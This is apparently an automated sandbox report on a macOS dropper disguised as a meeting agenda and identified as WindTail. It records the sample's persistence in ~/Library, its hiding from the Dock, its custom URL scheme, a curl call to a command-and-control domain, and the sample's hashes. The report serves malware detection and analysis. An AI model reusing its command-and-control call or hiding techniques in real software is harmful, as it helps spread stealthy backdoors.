
Analysis Report Meeting_Agenda.zip

Overview

General Information

Joe Sandbox Version: 25.0.0
Analysis ID: 66291
Start date: 24.12.2018
Start time: 09:33:49
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 6m 0s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Meeting_Agenda.zip
Cookbook file name: defaultmacfilecookbook.jbs
Analysis system description: Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection: MAL
Classification: mal60.troj.evad.macZIP@0/11@5/0

Detection

Strategy | Score | Range | Reporting | Whitelisted | Detection
Threshold | 60 | 0 - 100 | Report FP / FN | false | malicious

Classification

Analysis Advice

None of the domains contacted by the sample resolve. The sample is likely an old dropper that no longer works.



Mitre Att&ck Matrix

Initial Access: Valid Accounts; Replication Through Removable Media; Drive-by Compromise
Execution: Scripting [1]; Service Execution; Windows Management Instrumentation
Persistence: Hidden Files and Directories [21]; Port Monitors; Accessibility Features
Privilege Escalation: Port Monitors; Accessibility Features; Path Interception
Defense Evasion: Hidden Files and Directories [21]; Scripting [1]; Code Signing [2]
Credential Access: Credential Dumping; Network Sniffing; Input Capture
Discovery: System Information Discovery [11]; Application Window Discovery; Query Registry
Lateral Movement: Application Deployment Software; Remote Services; Windows Remote Management
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive
Exfiltration: Data Compressed; Exfiltration Over Other Network Medium; Automated Exfiltration
Command and Control: Standard Non-Application Layer Protocol [1]; Remote Access Tools [1]; Standard Application Layer Protocol [11]

Signature Overview



Networking:

Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 17.253.55.204
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Source: unknown | DNS traffic detected: query: flux2key.com reply code: Server failure (2)
Source: unknown | DNS traffic detected: query: string2me.com reply code: Server failure (2)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: flux2key.com

System Summary:

Classification label
Source: classification engine | Classification label: mal60.troj.evad.macZIP@0/11@5/0

Persistence and Installation Behavior:

Writes Mach-O files to untypical directories
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | 64-bit Mach-O written to unusual path: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode
Changes permissions of written Mach-O files
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | Permissions modified for written 64-bit Mach-O /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode: bits: - usr: rx grp: rx all: rwx
Creates hidden files, links and/or directories
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537) | Hidden file created: /Users/henry/Library/Meeting_Agenda.app/Contents/Resources/.dat.nosync0219.V8cWwQ
Executes commands using a shell command-line interpreter
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | Shell command executed: /bin/sh -c open -a /Users/henry/Library/Meeting_Agenda.app
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537) | Curl executable: /usr/bin/curl -> /usr/bin/curl string2me.com/qgHUDRZiYhOqQiN/kESklNvxsNZQcPl.php
Opens applications that may have been created by the sample itself
Source: /bin/sh (PID: 536) | Application opened: open -a /Users/henry/Library/Meeting_Agenda.app
Reads launchservices plist files
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/open (PID: 536) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537) | Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Reads the user launchservices plist file containing the default apps for the corresponding file types
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537) | Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Uses the CFNetwork bundle containing interfaces for network communication (HTTP, sockets, and Bonjour)
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537) | CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plist
Writes 64-bit Mach-O files to disk
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | File written: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode
Writes RTF files to disk
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | File written: /Users/henry/Library/Meeting_Agenda.app/Contents/Resources/en.lproj/Credits.rtf
Writes icon files to disk
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | File written: /Users/henry/Library/Meeting_Agenda.app/Contents/Resources/WXBN.icns
App bundle is code signed
Source: Submitted file: Meeting_Agenda.zip | CodeResources XML file: CodeResources
Submitted sample is a bundle that is signed
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | CodeSignature CodeResources file read: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/_CodeSignature/CodeResources
Uses the AppleKeyboardLayouts bundle containing keyboard layouts
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537) | AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Writes property list (.plist) files to disk
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | XML plist file created: /Users/henry/Library/Meeting_Agenda.app/Contents/_CodeSignature/CodeResources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | XML plist file created: /Users/henry/Library/Meeting_Agenda.app/Contents/Info.plist
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | Binary plist file created: /Users/henry/Library/Meeting_Agenda.app/Contents/Resources/en.lproj/MainMenu.nib

Hooking and other Techniques for Hiding and Protection:

Contains functionality to launch an application without a Dock icon (i.e. hidden from the user)
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | XML plist file created with NSUIElement = 1: /Users/henry/Library/Meeting_Agenda.app/Contents/Info.plist
Contains functionality to register custom URL schemes (potentially used for hidden execution via browsers)
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | XML plist file created with CFBundleURLSchemes: /Users/henry/Library/Meeting_Agenda.app/Contents/Info.plist

Language, Device and Operating System Detection:

Reads the system's hostname
Source: /bin/sh (PID: 536) | Sysctl requested: kern.hostname (1.10)
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537) | Sysctl requested: kern.hostname (1.10)
Reads the system or server version plist file
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/open (PID: 536) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist

Remote Access Functionality:

Detected macOS WindTail
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | IOC file dropped: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode


Runtime Messages

Command: open
Exit Code: 0
Exit Code Info: (none)
Killed: False
Standard Output: (none)
Standard Error: (none)

Behavior Graph


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
Behavior Graph ID: 66291 | Sample: Meeting_Agenda.zip | Start date: 24/12/2018 | Architecture: MAC | Score: 60

Graph contents (image not reproduced; node data as recovered from the graph):
  • Process: xpcproxy usrnode (started)
    • Created files: /Users/henry/Libra...tents/MacOS/usrnode (Mach-O, dropped); /Users/henry/Libra...Contents/Info.plist (XML, dropped)
    • Signatures: Detected macOS WindTail; Contains functionality to launch an application without a Dock icon (i.e. hidden from the user); Contains functionality to register custom URL schemes (potentially used for hidden execution via browsers); Writes Mach-O files to untypical directories
    • Started: sh open
  • Process: xpcproxy usrnode 1 (started)
    • Started: curl
  • DNS/IP Info: 17.253.55.204, ports 49236 and 80, APPLE-AUSTIN-AppleIncUS, United States; string2me.com; flux2key.com

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots

Thumbnails

This section contains all screenshots of the run as thumbnails, including those not shown in the slideshow (images are not included in this text export).

Startup

  • system is mac1
  • xpcproxy (PID: 535 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • usrnode (PID: 535 PPID: 1 Overlayed Process Image: xpcproxy MD5: c211dff0d9ecff416a1bf5a588ec2d5d)
    • sh (PID: 536 PPID: 535 MD5: 8aa60b22a5d30418a002b340989384dc)
    • open (PID: 536 PPID: 535 Overlayed Process Image: sh MD5: 40ed6d8f35c9f20484b97582d296398f)
  • xpcproxy (PID: 537 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • usrnode (PID: 537 PPID: 1 Overlayed Process Image: xpcproxy MD5: c211dff0d9ecff416a1bf5a588ec2d5d)
    • curl (PID: 538 PPID: 537 MD5: 078cd73f58d3d8f875eed22522ff73f7)
  • cleanup

Created / dropped Files

/Users/henry/Library/Meeting_Agenda.app/Contents/Info.plist
Process: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode
File Type: XML document text
Size (bytes): 1810
Entropy (8bit): 5.130244541175711
Encrypted: false
MD5: 34D8507FA6AF3F52C4261459135815EF
SHA1: 49607CD7D1EF6BDB8387CC8522DEAFC8452D1564
SHA-256: 1ED70921FE4C0DF16031054A9ED835053B3657084D15CE7E1DE68BDDCC88CEE5
SHA-512: 485BEBDBF797F5A9191DF6856661C19240703741D2604A45E64ADE87C426ADE21BC63428D6F96AE3C879CDC3D0BAD3804308D741E84C4254A3809EC5C126342D
Malicious: true
Reputation: low

/Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode
Process: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode
File Type: Mach-O 64-bit executable
Size (bytes): 109376
Entropy (8bit): 5.787503965793262
Encrypted: false
MD5: C211DFF0D9ECFF416A1BF5A588EC2D5D
SHA1: 1AA298A15E1A74B93F6C1B6F88A4CA9C245BF896
SHA-256: 842F8D9ACC11438DEF811F07EBAD5BC675DFFFBCF491F5F04209D31CCD6D18E5
SHA-512: 3B72D233A9B1296B14ACA376B069E18CE95B0BEEA3F593B577CFA846D77081848B73C65F8CA6B98AA7F066D2BFF1A4205E51A6C514B67F390D0F159E545EB9EA
Malicious: true
Reputation: low

/Users/henry/Library/Meeting_Agenda.app/Contents/PkgInfo
Process: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode
File Type: ASCII text, with no line terminators
Size (bytes): 8
Entropy (8bit): 1.75
Encrypted: false
MD5: 23B7D7D024ABB0F558420E098800BF27
SHA1: 9F9EEA0CFE2D65F2C3D6B092E375B40782D08F31
SHA-256: 82502191C9484B04D685374F9879A0066069C49B8ACAE7A04B01D38D07E8ECA0
SHA-512: F77D501528DD0CED155C80406CFBEE38D5D3649B64D2A9324F3D6CEE39491EB8F54CDEBAE49C6E21A20D2309D8FAE1B01C41631224811E73483DB25A2695738C
Malicious: false
Reputation: low

/Users/henry/Library/Meeting_Agenda.app/Contents/Resources/.dat.nosync0219.V8cWwQ
Process: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode
File Type: ASCII text, with no line terminators
Size (bytes): 16
Entropy (8bit): 3.0306390622295662
Encrypted: false
MD5: 3A03271C6A1394968ED69B46BFDD3515
SHA1: 6A199ED458DE7729B3A6F6B61A73A9CA69A6372A
SHA-256: 6355AF909AA663850F9B722981630DEAF70F1C683A3F275FA1EC3E682EBBCE44
SHA-512: 63B6DC7B78110228284735127BEE085DCDA8428374BB476FAF206AF86E8AA9AA37893FE722B8C0D355E166DDD8AF27468C87324C7BE72A467D72086F177D97E3
Malicious: false
Reputation: low

/Users/henry/Library/Meeting_Agenda.app/Contents/Resources/WXBN.icns
Process: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode
File Type: data
Size (bytes): 227766
Entropy (8bit): 7.736381501953322
Encrypted: false
MD5: 1CF99B2FA4C1BDF355824FC49025D3E5
SHA1: 7A6806C824EAF06D15906A6585019209AA07468A
SHA-256: B743C0443BB9B3D4AE6E13609F2CECAFF0CAB9D9B89837B805B4D03122DA0D6E
SHA-512: 5DB375621C9AA8B12B4CC6DA2D62F9AC1098A30887C9746B131E831EB4F61CA02371B38932501AB94965BF672E567BA8F7AEA0FC434A4408ABED8150DC1E38A9
Malicious: false
Reputation: low

/Users/henry/Library/Meeting_Agenda.app/Contents/Resources/en.lproj/Credits.rtf
Process: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode
File Type: Rich Text Format data, unknown version
Size (bytes): 436
Entropy (8bit): 4.962904598670011
Encrypted: false
MD5: F0D4A61CAF597423FF07C5E9B24A345E
SHA1: 60A248148B319DE26E36424D25021C2488E23CE8
SHA-256: B4386FE1CEF65CD91E6C8ECC065D117089083F91B7CADBF0C3E5EAE20E8B9640
SHA-512: E361011499CF70FC71E247FDDA71F49D913654A983AA4AE67D00DC977E53B9CF0D88D4D2AC07EFE248261C3AB6E3345E829E22DDA3E51DCCC221A94C660ACE69
Malicious: false
Reputation: low

/Users/henry/Library/Meeting_Agenda.app/Contents/Resources/en.lproj/InfoPlist.strings
Process: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode
File Type: Little-endian UTF-16 Unicode C program text
Size (bytes): 92
Entropy (8bit): 3.2610300066712608
Encrypted: false
MD5: 51EF59B60E5B41B91519CC662A9FE886
SHA1: 3222CA0C39EB50AAF8126BAF852E55430C4718AF
SHA-256: 39CF2EE07B7B333E7C179D0BF4D798A5B72AF6A4E584F51E642703BBFA4FC828
SHA-512: 3952A908B72D44040F5072F6344F6327FC78981C3AA55E931ACAE84C0C9BCC0D148991CD564AF4803765C328CBF5F7EFE9EB558FC56E47E8206B7B706026F30A
Malicious: false
Reputation: low

/Users/henry/Library/Meeting_Agenda.app/Contents/Resources/en.lproj/MainMenu.nib
Process: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode
File Type: Apple binary property list
Size (bytes): 1183
Entropy (8bit): 6.409092690797022
Encrypted: false
MD5: 01C8F3B137E4FF4EB3F1547AE7503B24
SHA1: 137805C46825A28DC007229B9995B4FEFCA252D6
SHA-256: 5DBF8A652E848D0D102A86E1F07BEF1937ED39F149ED123579EA45F36FBBF5D2
SHA-512: 428121AD3308293F6E7621015FC913276166D3667F25E976D3609A657D5FE3769F64C054B2062760312C988FE29F7861C908EC7808BEF2DE5BC6942E2869B841
Malicious: false
Reputation: low

/Users/henry/Library/Meeting_Agenda.app/Contents/_CodeSignature/CodeResources
Process: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode
File Type: XML document text
Size (bytes): 3214
Entropy (8bit): 4.961458379982957
Encrypted: false
MD5: 48845BD7B264E458CA47855981E44818
SHA1: C22AEF8AD246A7C05345556B8ED17E4DCBD90B72
SHA-256: A0A47E9C1A5A79AFC68324B11BA7462B88C966D9FD708550A24358DF87AF4DE9
SHA-512: 4E844C5A65A525683E203F737670DD1545AB08C51C1BB92F32D155A48A996F51513BD5815534999AE73925B1E87BE6C27117787709E02D9E8DEA967792E96924
Malicious: false
Reputation: low

/dev/null
Process: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode
File Type: ASCII text
Size (bytes): 63
Entropy (8bit): 4.8322169792551914
Encrypted: false
MD5: B2C5D0885B31377CDC574C3E82B61B99
SHA1: F5085653F6B01F44FC1A8939AFC72AE7F454AFE9
SHA-256: 6E06A818BE46110A80BAF3DBD0E893C9A01847E2BF3882B476D76387973A28BF
SHA-512: 517F58CF309FB20BFE9CAB932AF52B66BC43BA0DD17EF9DFD9D892DC01ADB01E355CB88935420DE2EF53028305404EE166F00252FB8D71139CAA6616AD5BF845
Malicious: false
Reputation: low

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
string2me.com | unknown | unknown | false | (none) | unknown
flux2key.com | unknown | unknown | false | (none) | unknown

Contacted IPs


Public

IP | Country | ASN | ASN Name | Malicious
17.253.55.204 | United States | 6185 | APPLE-AUSTIN-AppleIncUS | false

Static File Info

General

File type: Zip archive data, at least v1.0 to extract
Entropy (8bit): 7.994905888951247
TrID:
  • Mac OS X Application Bundle (12004/1) 74.95%
  • ZIP compressed archive (4004/1) 25.00%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name: Meeting_Agenda.zip
File size: 252284
MD5: 36284fdcd2c9cf53973adcae9d5144d1
SHA1: 4613f5b1e172cb08d6a2e7f2186e2fdd875b24e5
SHA256: ad282e5ba2bc06a128eb20da753350278a2e47ab545fdab808e94a2ff7b4061e
SHA512: 9f0fbca947e0fbe11455ec58cecdb4b5038f35c55de2cb777d4ed44ca7d60088ce85d77527ea5bf56a7785a00a82686219b7b79694a06fefd10be5670e2c90c3
SSDEEP: 6144:KDY6w9qtblTi2V1UIQ70PtsTKGVwb+3G8DwiP:KDTttZVCIU0Pt+K4wb+W8DD
File Content Preview: PK..........7J................Meeting_Agenda.app/UX.....XX..X....PK........3.7J................Meeting_Agenda.app/Contents/UX.....X...X....PK........3.7J............+...Meeting_Agenda.app/Contents/_CodeSignature/UX.....X...X....PK........3.7J............8

Static App Info

General Information

Package Info:

Property List File:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>BuildMachineOSBuild</key><string>14B25</string>
  <key>CFBundleDevelopmentRegion</key><string>en</string>
  <key>CFBundleExecutable</key><string>usrnode</string>
  <key>CFBundleIconFile</key><string>WXBN</string>
  <key>CFBundleIdentifier</key><string>com.alis.tre</string>
  <key>CFBundleInfoDictionaryVersion</key><string>6.0</string>
  <key>CFBundleName</key><string>usrnode</string>
  <key>CFBundlePackageType</key><string>APPL</string>
  <key>CFBundleShortVersionString</key><string>1.0</string>
  <key>CFBundleSignature</key><string>????</string>
  <key>CFBundleURLTypes</key>
  <array>
    <dict>
      <key>CFBundleURLName</key><string>Local File</string>
      <key>CFBundleURLSchemes</key>
      <array><string>openurl2622007</string></array>
    </dict>
  </array>
  <key>CFBundleVersion</key><string>1</string>
  <key>DTCompiler</key><string>com.apple.compilers.llvm.clang.1_0</string>
  <key>DTPlatformBuild</key><string>6D570</string>
  <key>DTPlatformVersion</key><string>GM</string>
  <key>DTSDKBuild</key><string>14D125</string>
  <key>DTSDKName</key><string>macosx10.10</string>
  <key>DTXcode</key><string>0630</string>
  <key>DTXcodeBuild</key><string>6D570</string>
  <key>LSMinimumSystemVersion</key><string>10.7</string>
  <key>NSAppTransportSecurity</key>
  <dict><key>NSAllowsArbitraryLoads</key><true/></dict>
  <key>NSHumanReadableCopyright</key><string>Copyright 2015 app. All rights reserved.</string>
  <key>NSMainNibFile</key><string>MainMenu</string>
  <key>NSPrincipalClass</key><string>NSApplication</string>
  <key>NSUIElement</key><string>1</string>
</dict>
</plist>

Resources

Name | Type
Info.plist | XML document text
PkgInfo | ASCII text, with no line terminators
usrnode | Mach-O 64-bit executable
WXBN.icns | data
Credits.rtf | Rich Text Format data, unknown version
InfoPlist.strings | Little-endian UTF-16 Unicode C program text
MainMenu.nib | Apple binary property list
CodeResources | XML document text

Static Mach Info

General Information for header0

Endian: < (little-endian)
Size: 64-bit
Architecture: x86_64
Filetype: execute
Nbr. of load commands: 23

segment_command_64 (__PAGEZERO)
  fileoff: 0 | maxprot: 0 | vmsize: 4294967296 | nsects: 0 | flags: 0 | filesize: 0 | vmaddr: 0 | initprot: 0

segment_command_64 (__TEXT)
  fileoff: 0 | maxprot: 7 | vmsize: 77824 | nsects: 11 | flags: 0 | filesize: 77824 | vmaddr: 4294967296 | initprot: 5

  sectname | segname | addr | size | offset | align | flags | reloff | nreloc | reserved1 | reserved2 | reserved3
  __text | __TEXT | 4294974600 | 31843 | 7304 | 2 | 2147484672 | 0 | 0 | 0 | 0 | 0
  __stubs | __TEXT | 4295006444 | 498 | 39148 | 1 | 2147484680 | 0 | 0 | 0 | 6 | 0
  __stub_helper | __TEXT | 4295006944 | 846 | 39648 | 2 | 2147484672 | 0 | 0 | 0 | 0 | 0
  __objc_methname | __TEXT | 4295007790 | 5216 | 40494 | 0 | 2 | 0 | 0 | 0 | 0 | 0
  __cstring | __TEXT | 4295013008 | 2383 | 45712 | 4 | 2 | 0 | 0 | 0 | 0 | 0
  __ustring | __TEXT | 4295015392 | 142 | 48096 | 1 | 0 | 0 | 0 | 0 | 0 | 0
  __objc_classname | __TEXT | 4295015534 | 172 | 48238 | 0 | 2 | 0 | 0 | 0 | 0 | 0
  __objc_methtype | __TEXT | 4295015706 | 1369 | 48410 | 0 | 2 | 0 | 0 | 0 | 0 | 0
  __const | __TEXT | 4295017088 | 20912 | 49792 | 4 | 0 | 0 | 0 | 0 | 0 | 0
  __unwind_info | __TEXT | 4295038000 | 480 | 70704 | 2 | 0 | 0 | 0 | 0 | 0 | 0
  __eh_frame | __TEXT | 4295038480 | 6632 | 71184 | 3 | 0 | 0 | 0 | 0 | 0 | 0

segment_command_64 (__DATA)
  fileoff: 77824 | maxprot: 7 | vmsize: 16384 | nsects: 20 | flags: 0 | filesize: 12288 | vmaddr: 4295045120 | initprot: 3

  sectname | segname | addr | size | offset | align | flags | reloff | nreloc | reserved1 | reserved2 | reserved3
  __program_vars | __DATA | 4295045120 | 40 | 77824 | 3 | 0 | 0 | 0 | 0 | 0 | 0
  __nl_symbol_ptr | __DATA | 4295045160 | 16 | 77864 | 3 | 6 | 0 | 0 | 83 | 0 | 0
  __got | __DATA | 4295045176 | 80 | 77880 | 3 | 6 | 0 | 0 | 85 | 0 | 0
  __la_symbol_ptr | __DATA | 4295045256 | 664 | 77960 | 3 | 7 | 0 | 0 | 95 | 0 | 0
  __cfstring | __DATA | 4295045920 | 2080 | 78624 | 3 | 0 | 0 | 0 | 0 | 0 | 0
  __objc_classlist | __DATA | 4295048000 | 40 | 80704 | 3 | 268435456 | 0 | 0 | 0 | 0 | 0
  __objc_nlclslist | __DATA | 4295048040 | 8 | 80744 | 3 | 268435456 | 0 | 0 | 0 | 0 | 0
  __objc_catlist | __DATA | 4295048048 | 40 | 80752 | 3 | 268435456 | 0 | 0 | 0 | 0 | 0
  __objc_protolist | __DATA | 4295048088 | 40 | 80792 | 3 | 0 | 0 | 0 | 0 | 0 | 0
  __objc_imageinfo | __DATA | 4295048128 | 8 | 80832 | 2 | 0 | 0 | 0 | 0 | 0 | 0
  __objc_const | __DATA | 4295048136 | 6056 | 80840 | 3 | 0 | 0 | 0 | 0 | 0 | 0
  __objc_selrefs | __DATA | 4295054192 | 1480 | 86896 | 3 | 268435461 | 0 | 0 | 0 | 0 | 0
  __objc_protorefs | __DATA | 4295055672 | 16 | 88376 | 3 | 0 | 0 | 0 | 0 | 0 | 0
  __objc_classrefs | __DATA | 4295055688 | 248 | 88392 | 3 | 268435456 | 0 | 0 | 0 | 0 | 0
  __objc_superrefs | __DATA | 4295055936 | 24 | 88640 | 3 | 268435456 | 0 | 0 | 0 | 0 | 0
  __objc_ivar | __DATA | 4295055960 | 248 | 88664 | 3 | 0 | 0 | 0 | 0 | 0 | 0
  __objc_data | __DATA | 4295056208 | 480 | 88912 | 3 | 0 | 0 | 0 | 0 | 0 | 0
  __data | __DATA | 4295056688 | 464 | 89392 | 3 | 0 | 0 | 0 | 0 | 0 | 0
  __common | __DATA | 4295057152 | 40 | 0 | 3 | 1 | 0 | 0 | 0 | 0 | 0
  __bss | __DATA | 4295057200 | 1025 | 0 | 4 | 1 | 0 | 0 | 0 | 0 | 0

segment_command_64 (__LINKEDIT)
  fileoff: 90112 | maxprot: 7 | vmsize: 20480 | nsects: 0 | flags: 0 | filesize: 19264 | vmaddr: 4295061504 | initprot: 1

dyld_info_command
  rebase_off: 90112 | rebase_size: 368 | bind_off: 90480 | bind_size: 1448 | weak_bind_off: 91928 | weak_bind_size: 16 | lazy_bind_off: 91944 | lazy_bind_size: 1808 | export_off: 93752 | export_size: 192

symtab_command
  symoff: 94160 | nsyms: 127 | stroff: 96904 | strsize: 2344

dysymtab_command
  ilocalsym: 0 | nlocalsym: 1 | iextdefsym: 1 | nextdefsym: 1 | iundefsym: 2 | nundefsym: 125 | tocoff: 0 | ntoc: 0 | modtaboff: 0 | nmodtab: 0 | extrefsymoff: 0 | nextrefsyms: 0 | indirectsymoff: 96192 | nindirectsyms: 178 | extreloff: 0 | nextrel: 0 | locreloff: 0 | nlocrel: 0

dylinker_command
  name: 12 | Data: /usr/lib/dyld

uuid_command
  uuid: 0c515d6269c53afe9f017105626230fe

version_min_command
  version: 657152 | reserved: 657920

dylib_command (9 entries)
  Data | compatibility_version | current_version | name | timestamp
  /usr/lib/libcrypto.0.9.8.dylib | 2312.0.0 | 2312.0.0 | 24 | Thu Jan 01 01:00:02 1970
  /System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa | 0.1.0 | 0.21.0 | 24 | Thu Jan 01 01:00:02 1970
  /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation | 0.44.1 | 5120.129.4 | 24 | Thu Jan 01 01:00:02 1970
  /usr/lib/libobjc.A.dylib | 0.1.0 | 0.228.0 | 24 | Thu Jan 01 01:00:02 1970
  /usr/lib/libstdc++.6.dylib | 0.7.0 | 256.104.0 | 24 | Thu Jan 01 01:00:02 1970
  /usr/lib/libSystem.B.dylib | 0.1.0 | 0.189.4 | 24 | Thu Jan 01 01:00:02 1970
  /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit | 0.45.0 | 14592.67.5 | 24 | Thu Jan 01 01:00:02 1970
  /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation | 0.150.0 | 4608.129.4 | 24 | Thu Jan 01 01:00:02 1970
  /System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices | 0.1.0 | 0.62.0 | 24 | Thu Jan 01 01:00:02 1970

linkedit_data_command (3 entries)
  dataoff: 93944 | datassize: 216
  dataoff: 94160 | datassize: 0
  dataoff: 99248 | datassize: 10128

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dez 24, 2018 09:34:58.404784918 MEZ | 56981 | 53 | 192.168.0.50 | 8.8.8.8
Dez 24, 2018 09:34:58.409457922 MEZ | 53 | 56981 | 8.8.8.8 | 192.168.0.50
Dez 24, 2018 09:34:58.622513056 MEZ | 55248 | 53 | 192.168.0.50 | 8.8.8.8
Dez 24, 2018 09:34:59.259896994 MEZ | 50843 | 53 | 192.168.0.50 | 8.8.8.8
Dez 24, 2018 09:34:59.469114065 MEZ | 53 | 50843 | 8.8.8.8 | 192.168.0.50
Dez 24, 2018 09:34:59.469690084 MEZ | 50843 | 53 | 192.168.0.50 | 8.8.4.4
Dez 24, 2018 09:34:59.627952099 MEZ | 55248 | 53 | 192.168.0.50 | 8.8.8.8
Dez 24, 2018 09:34:59.679302931 MEZ | 53 | 50843 | 8.8.4.4 | 192.168.0.50
Dez 24, 2018 09:34:59.835935116 MEZ | 53 | 55248 | 8.8.8.8 | 192.168.0.50
Dez 24, 2018 09:34:59.836395979 MEZ | 55248 | 53 | 192.168.0.50 | 8.8.4.4
Dez 24, 2018 09:35:00.049880981 MEZ | 53 | 55248 | 8.8.4.4 | 192.168.0.50
Dez 24, 2018 09:35:20.063322067 MEZ | 49236 | 80 | 192.168.0.50 | 17.253.55.204
Dez 24, 2018 09:35:20.074521065 MEZ | 80 | 49236 | 17.253.55.204 | 192.168.0.50
Dez 24, 2018 09:35:20.074728966 MEZ | 49236 | 80 | 192.168.0.50 | 17.253.55.204

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
